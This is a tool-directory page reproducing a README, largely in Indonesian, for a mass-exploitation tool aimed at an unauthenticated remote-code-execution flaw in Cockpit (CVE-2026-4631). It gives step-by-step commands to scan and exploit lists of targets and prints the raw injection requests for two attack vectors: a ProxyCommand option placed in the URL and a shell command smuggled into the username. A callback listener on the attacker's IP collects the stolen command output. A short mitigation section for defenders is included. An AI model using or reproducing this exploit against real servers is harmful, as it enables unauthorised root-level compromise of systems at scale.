Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-4631-cockpit-RCE — Unauthenticated Remote Code Execution via SSH Command-Line Argument Injection Cockpit versions 327 – 359 | CVSS 9.8 Critical | CWE-78 | Kitploit
Tools/GitHubGitHub/exdev994/cve-2026-4631-cockpit-rce
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubexdev994/cve-2026-4631-cockpit-rce

CVE-2026-4631-cockpit-RCE

Unauthenticated Remote Code Execution via SSH Command-Line Argument Injection Cockpit versions 327 – 359 | CVSS 9.8 Critical | CWE-78

View Repository
212 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
Content not available in the requested language. Showing English version.

CVE-2026-4631 — Cockpit Mass Exploit Tool

Unauthenticated Remote Code Execution via SSH Command-Line Argument Injection Cockpit versions 327 – 359 | CVSS 9.8 Critical | CWE-78

Tool mass exploitation untuk CVE-2026-4631 pada Cockpit web service (cockpit-ws, port 9090). Mendukung mode vulnerability scan, mode RCE dengan capture output command via built-in HTTP callback listener, mode --auto (scan + exploit sekali jalan dengan command default id), auto-add port :9090 untuk target tanpa port, kedua attack vector (ProxyCommand + username %r injection), mass target dari file, concurrency threading, dan output result terstruktur.

Author: 0xNuts


Quick Start

Clone & Install

git clone https://github.com/ExDev994/CVE-2026-4631-cockpit-RCE.git
cd CVE-2026-4631-cockpit-RCE
pip install -r requirements.txt

Siapkan Target

Edit targets.txt — satu host per baris. Port :9090 otomatis ditambahkan jika tidak ada:

192.168.1.10
cockpit.example.com
https://manage.lab.local

Jalankan (Mode AUTO — Recommended)

# Scan + exploit sekali jalan, command default "id"
python3 exploit.py -f targets.txt --auto --callback-ip <IP_ATTACKER>

# Contoh output di results.txt:
# example.com:9090 [ uid=0(root) gid=0(root) groups=0(root) ]

Mode Lainnya

# Scan vulnerability saja (tanpa exploit)
python3 exploit.py -f targets.txt --scan -o scan_results.txt

# RCE eksplisit dengan command custom
python3 exploit.py -f targets.txt -c "whoami" --callback-ip <IP_ATTACKER>

# Single target
python3 exploit.py -t cockpit.example.com --auto --callback-ip <IP_ATTACKER>

Catatan Callback

CVE-2026-4631 adalah blind RCE — output command tidak kembali di HTTP response. Tool pakai built-in HTTP listener (port default 8888) untuk capture output. Pastikan:

  1. --callback-ip adalah IP yang reachable dari target (bukan 127.0.0.1)
  2. Firewall allow inbound TCP port 8888 (atau --listener-port custom)
  3. Target bisa outbound HTTP ke IP attacker

Cara Fix / Mitigasi (Defender)

1. Upgrade Cockpit (Mandatory)

# Debian / Ubuntu
sudo apt update && sudo apt install cockpit-ws

# RHEL / Fedora / CentOS
sudo dnf update cockpit-ws

# Verifikasi versi (harus >= 360)
dpkg -l cockpit-ws | awk 'NR==5{print $3}'   # Debian
rpm -q cockpit-ws                            # RHEL

2. Disable Remote Login (Workaround)

Edit /etc/cockpit/cockpit.conf:

[WebService]
LoginTo = false

Restart service:

sudo systemctl restart cockpit

3. Network Segmentation

Restrict port 9090 ke management network saja:

sudo iptables -A INPUT -p tcp --dport 9090 -s 10.0.0.0/8 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 9090 -j DROP

4. Upgrade OpenSSH >= 9.6

Mitigates Vector 1 (ProxyCommand injection) via early hostname validation:

ssh -V   # harus OpenSSH_9.6 atau lebih baru

5. Patch Manual (Backport)

Jika tidak bisa upgrade ke 360, apply patch commit:

  • cockpit 9d0695647 — tambah -- separator di beiboot.py dan cockpitauth.c
  • ferny 44ec511c99 — tambah -- di session.py

Detail patch: lihat docs/PATCH_ANALYSIS.md


Daftar Isi

  1. Ringkasan Vulnerability
  2. Attack Vector
  3. Prasyarat Eksploitasi
  4. Instalasi
  5. Penggunaan
  6. Mode Operasi
  7. Contoh Eksekusi
  8. Format Output
  9. Arsitektur Tool
  10. Struktur File
  11. Mekanisme Blind RCE Capture
  12. Deteksi & Mitigasi
  13. Disclaimer Hukum
  14. Referensi

Ringkasan Vulnerability

FieldDetail
CVE IDCVE-2026-4631
GHSAGHSA-m4gv-x78h-3427
SeverityCritical (CVSS 9.8)
CWECWE-78 — OS Command Injection
AffectedCockpit 327 – 359
Fixed inCockpit 360+
Auth requiredNO (pre-authentication)
ReporterJelle van der Waa
Servicecockpit-ws, default port 9090

Cockpit v327 mengganti cockpit-ssh (libssh) dengan python3 -m cockpit.beiboot yang invoke system OpenSSH ssh client. User-controlled input — hostname dari URL path dan username dari Authorization: Basic header — dipass ke ssh tanpa sanitasi dan tanpa -- end-of-options separator. Injection terjadi sebelum credential verification, jadi tidak butuh login valid.


Attack Vector

Vector 1 — ProxyCommand Injection (Primary)

Hostname dari URL path di-inject dengan SSH option -oProxyCommand=<cmd>.

GET /cockpit+=-oProxyCommand=<URL_ENCODED_PAYLOAD>/login HTTP/1.1
Host: target:9090
Authorization: Basic base64("x:x")

SSH parse -oProxyCommand=<cmd> sebagai option, eksekusi <cmd> sebagai ProxyCommand. Command jalan sebagai user process cockpit-ws.

Prasyarat: OpenSSH < 9.6 di target. OpenSSH 9.6+ punya early hostname validation yang block metacharacters.

Vector 2 — Username %r Token Injection (Secondary)

Username dari Authorization: Basic header di-inject dengan shell command.

GET /cockpit+=legit-host/login HTTP/1.1
Host: target:9090
Authorization: Basic base64("x; <CMD>; #:x")

SSH expand %r dengan username di Match exec directive → shell execute injected command.

Prasyarat: target ssh_config punya Match exec directive dengan %r token.


Prasyarat Eksploitasi

Sisi Attacker (mesin yang jalan tool)

  • Python 3.8+
  • IP reachable dari target Cockpit (untuk callback listener)
  • Port terbuka untuk listener (default 8888)
  • Firewall allow inbound dari target ke listener port

Sisi Target (Cockpit instance)

  • Cockpit version 327 – 359
  • Port 9090 reachable
  • Remote login feature (LoginTo) tidak di-disable
  • Untuk Vector 1: OpenSSH < 9.6
  • Untuk Vector 2: ssh_config dengan Match exec %r

Instalasi

# Clone dari GitHub
git clone https://github.com/ExDev994/CVE-2026-4631-cockpit-RCE.git
cd CVE-2026-4631-cockpit-RCE

# Install dependency
pip install -r requirements.txt

# Verifikasi
python3 exploit.py --help

Dependencies

  • requests>=2.31 — HTTP client untuk exploit request
  • colorama>=0.4 — colored terminal output

Tidak ada dependency tambahan untuk listener (menggunakan stdlib http.server + threading).


Penggunaan

usage: exploit.py [-h] [-t TARGET] [-f FILE] [--default-port PORT]
                  [-c CMD] [--scan] [--auto] [--vector {auto,proxycommand,username}]
                  [-o OUTPUT] [--callback-ip CALLBACK_IP] [--listener-port LISTENER_PORT]
                  [--threads THREADS] [--timeout TIMEOUT] [--delay DELAY] [--proxy PROXY]
                  [--user-agent UA] [-v] [--no-color]

CVE-2026-4631 Cockpit Mass Exploit — Unauthenticated RCE via SSH Argument Injection
Download Tool